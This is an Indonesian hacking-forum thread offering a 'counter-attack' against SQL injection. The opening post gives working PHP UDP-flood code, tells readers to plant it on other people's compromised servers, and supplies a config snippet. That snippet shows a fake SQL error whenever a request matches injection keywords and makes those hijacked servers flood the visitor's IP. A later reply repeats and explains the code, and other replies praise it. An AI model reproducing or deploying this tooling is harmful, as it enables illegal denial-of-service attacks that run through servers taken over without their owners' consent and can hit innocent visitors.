Lawan Sqli dengan DDOS!!!
#1
Thumbs Up 
Hallo ane balik lagi msh berhubungan dengan sql injection,,, (:|
yah memang kadang2 pertahanan yang baik itu tw cara menyerang,, tapi disini kita bertahan dengan membalikkan serangan dengan bertubi-tubi Angry

siapkan peralatan kalian hmmm,,,,
1. server2 yg sudah kalian tanam zombie2 buat ddos (bisa pake script UDP FLOOD yg di buat ma om Zee di thread attacker zone
2. membuat script untuk melakukan serangan secara automatis,, yeahh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
pertama siapkan file php,, untuk di tanam di server2 orang,, (jgn cuman dipes mlu yah kerjanya Smile )
bisa pake script ini jga,, ini sebenrnya script UDP FLOOD dari om zee,, cuman dah ane ubah dikit2..
PHP Code:
<?
    $packets = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);
    
    $exec_time = 100;
    
    $time = time();
    $max_time = $time+$exec_time;

    $host = $_REQUEST['host'];
    
    for($i=0;$i<65000;$i++){
            $out .= 'X';
    }
    while(1){
    $packets++;
            if(time() > $max_time){
                    break;
            }
            $rand = rand(1,65000);
            $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
            if($fp){
                    fwrite($fp, $out);
                    fclose($fp);
            }
    }
?>
nah silahkan upload file udp flood itu di server orang,, makin banyak makin asik... ksh nama aja ddos.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
langsung aja kita buat script php untuk melakukan serangan otomatis,, nah silahkan copas script ini di confih.php web anda,, atau bisa jga di file2 yg sering di load
PHP Code:
$ip=$_SERVER['REMOTE_ADDR'];
if (isset(
$_GET['id']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i'$_GET['id']))
{
echo 
"mysql_fetch_array() expects parameter 1 to /home/namawebanda/public_html/index.php on line 22"//buat nampilin bug boongan
?>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script>
$.get('http://www.server1.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server2.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server3.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
</script>
<?

nah maksud dari
Code:
$.get('http://www.server1.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
misalnya web yg ada file ddos saya di server1.com/ddos.php
jika anda udah punya zombie di web orang,, silahkan tambahkan saja di atas code </script>

nah sekian dari saya... semoga sangat membantu yah,,

#2
om, asli logikanya keren banget , wkwkwkwk, counter attack counter attack sayangnya ane masih mau belajar nih bikin server sendiri, tpi rate 2 dah buat om
jadi zombienya yg ini aja kan om yah yg yg di ganti http://www.server1,2,3.com/ ?

oh iya I love backtrack om, kwkwkwkwk

#3
ane belajar PHP belum sapek segini , haha ,berarti script2 buat protect dari inject di PHP itu bukan benterng paling kuat ya ??

-_-
<<Hacker : 1995 << My Inspiration | yak yak yak

#4
nice tut kk, meskipun saya bingung Sad
+1 dari ane Smile
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#5
(05-25-2013, 09:28 AM)green_word Wrote: ane belajar PHP belum sapek segini , haha ,berarti script2 buat protect dari inject di PHP itu bukan benterng paling kuat ya ??

-_-

siapa bilang??

protect beda dengan attack mas

coba perhatikan . itu TS nya bahas attack back si attacker, dengan kata lain sembari mem protect juga meng attack balik
bukan protect doank

buktinya site ku cuma pake protect dari kode php aja belum jebol, aku udah open pentest malah

#6
nice tutorial om. sebenernya konsepnya sederhana. kita membuat sebuah server palsu (honeypot) dengan keterangan vulnerable boongan juga Big Grin untuk memicu ddos melewati penyamaan pattern perintah bug sqli yang biasanya dipake untuk menyerang. liat kode di bawah ni
PHP Code:
if (isset($_GET['id']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i'$_GET['id'])) 
ngga asing kan bagi yang sering sqli? Big Grin nah. apabila terdapat beberapa perintah bug sqli tersebut, maka yang akan dilakukan adalah membuka halaman zombie yang udah terpasang ddos untuk menyerang balik (counter attack) sekalian nampilin bug boongan Smile
PHP Code:
else {
echo 
"mysql_fetch_array() expects parameter 1 to /home/namawebanda/public_html/index.php on line 22"//buat nampilin bug boongan
?>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script>
$.get('http://www.server1.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server2.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server3.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
</script>
<?

maap neh Big Grin cuman memperjelas aja buat yang kurang paham ama konsepnya Big Grin cmiiw

#7
haha , gue cuma bisa protect enggak bisa script buat lawan balik , hehehe
<<Hacker : 1995 << My Inspiration | yak yak yak

#8
(05-25-2013, 09:01 AM)blu3creter Wrote: om, asli logikanya keren banget , wkwkwkwk, counter attack counter attack sayangnya ane masih mau belajar nih bikin server sendiri, tpi rate 2 dah buat om
jadi zombienya yg ini aja kan om yah yg yg di ganti ,2,3.com/ ?

oh iya I love backtrack om, kwkwkwkwk

iya om tinggal ganti aja yg server1,2,3 mas nama web yg dah di upload udp flood.. :-bd

#9
wahh keren. logika nya...

#10
menyimak, mempelajari dulu. terima kasih atas share tutorialnya
Don't forget visit below






Users browsing this thread: 1 Guest(s)